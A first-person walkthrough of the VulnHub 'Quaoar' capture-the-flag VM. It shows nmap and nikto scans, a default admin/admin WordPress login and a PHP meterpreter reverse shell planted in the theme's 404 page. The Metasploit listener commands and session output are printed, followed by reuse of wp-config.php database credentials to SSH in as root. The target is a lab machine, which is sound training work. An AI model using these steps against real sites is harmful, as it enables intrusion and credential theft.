Hackfest2016 Quaoar Walkthrough

Today I took some time to complete a simple CTF from VulnHub called Quaoar. In the links you can find all the info about how to get this CTF VM.

I downloaded the vm file and opened it with VirtualBox. I started with an nmap command, not only to find new machines on my network but also to know its services:

nmap -sV 192.168.1.0/24

And I found:

Nmap scan report for 192.168.1.37
Host is up (0.040s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Then, my second step was to check on the HTTP server..

Quaoar Hack The Planet

I tried downloading both images and extracting their metadata.. no luck.

I continued by taking a closer look to the server with nikto, and this is what I found:

# nikto -host http://192.168.1.37
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.37
+ Target Hostname:    192.168.1.37
+ Target Port:        80
+ Start Time:         2017-03-20 18:33:20 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 01:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wordpress/: A Wordpress installation was found.
+ 8348 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-03-20 18:34:08 (GMT-3) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

First I tried hitting http://192.168.1.37/icons/README with no luck. A plain txt with no apparent value popped out.

Then I tried the ever popular wordpress directory. Yes! we have a running installation, it also seems to be the default one!

Wordpress install

We all know the wp-admin folder!, let’s just try admin/admin. Whoooaaa, I was in!

Wordpress default passwords

Ok, now, by having access to the wordpress file manager, I can just drop a meterpreter in there and get a reverse shell.

I created a php file with the meterpreter payload as shown in the following image:

Meterpreter

Then I added the shell code to the 404 page using the wordpress theme editor.

Editor

I started msfconsole and set up the listener. Once I finished, I just forced a 404 error on wordpress by fetching an unexisting post id.

msf > use exploit/multi/handler 
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.38
LHOST => 192.168.1.38
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.38:4444 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.37
[*] Meterpreter session 1 opened (192.168.1.38:4444 -> 192.168.1.37:40345) at 2017-03-20 19:12:40 -0300

meterpreter > sysinfo
Computer    : Quaoar
OS          : Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/linux
meterpreter > pwd
/var/www/wordpress
meterpreter > ls
Listing: /var/www/wordpress
===========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  418    fil   2016-10-26 21:45:26 -0300  index.php
100644/rw-r--r--  19930  fil   2016-10-26 21:45:26 -0300  license.txt
100644/rw-r--r--  7195   fil   2016-10-26 21:45:26 -0300  readme.html
100644/rw-r--r--  4896   fil   2016-10-26 21:45:26 -0300  wp-activate.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-admin
100644/rw-r--r--  271    fil   2016-10-26 21:45:26 -0300  wp-blog-header.php
100644/rw-r--r--  4818   fil   2016-10-26 21:45:26 -0300  wp-comments-post.php
100644/rw-r--r--  3087   fil   2016-10-26 21:45:26 -0300  wp-config-sample.php
100666/rw-rw-rw-  3441   fil   2016-11-30 02:02:01 -0300  wp-config.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-content
100644/rw-r--r--  2932   fil   2016-10-26 21:45:26 -0300  wp-cron.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-includes
100644/rw-r--r--  2380   fil   2016-10-26 21:45:26 -0300  wp-links-opml.php
100644/rw-r--r--  2359   fil   2016-10-26 21:45:26 -0300  wp-load.php
100644/rw-r--r--  33609  fil   2016-10-26 21:45:26 -0300  wp-login.php
100644/rw-r--r--  8235   fil   2016-10-26 21:45:26 -0300  wp-mail.php
100644/rw-r--r--  11070  fil   2016-10-26 21:45:26 -0300  wp-settings.php
100644/rw-r--r--  25665  fil   2016-10-26 21:45:26 -0300  wp-signup.php
100644/rw-r--r--  4026   fil   2016-10-26 21:45:26 -0300  wp-trackback.php
100644/rw-r--r--  3032   fil   2016-10-26 21:45:26 -0300  xmlrpc.php

I got a shell to the server, the only problem was that I was running into the server process with almost no privileges. I did a cat wp-config.php to see if there where any DB credentials that could help and I found:

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

Sooooo, let’s remember the port 22 was opened! I’ll try to ssh in with those credentials.

Bingo! I’m in as root!

Getting root access

So I’ve completed 2 of the 3 flags for this VM, I just need to find wich is the post-exploitation vulnerability.

By detailed listing the root home I found a flag:

Getting root access

I searched the flag but no info was leaked (at least by trying a reverse search on crackstation).

Then, by looking the .lesshst file I got an idea: search the entire filesystem for flag.txt files!

Searching for flags clue

Found 2 flags in total. None of them leaked info on crackstation.

Global search

I when ahead for more on the home dir, but that was all

home directory

To be honest, I’m not sure if there is something more to take advantage of, maybe wordpress users credentials?

But by getting root access and finding another unexpected flag I feel like this CTF is complete!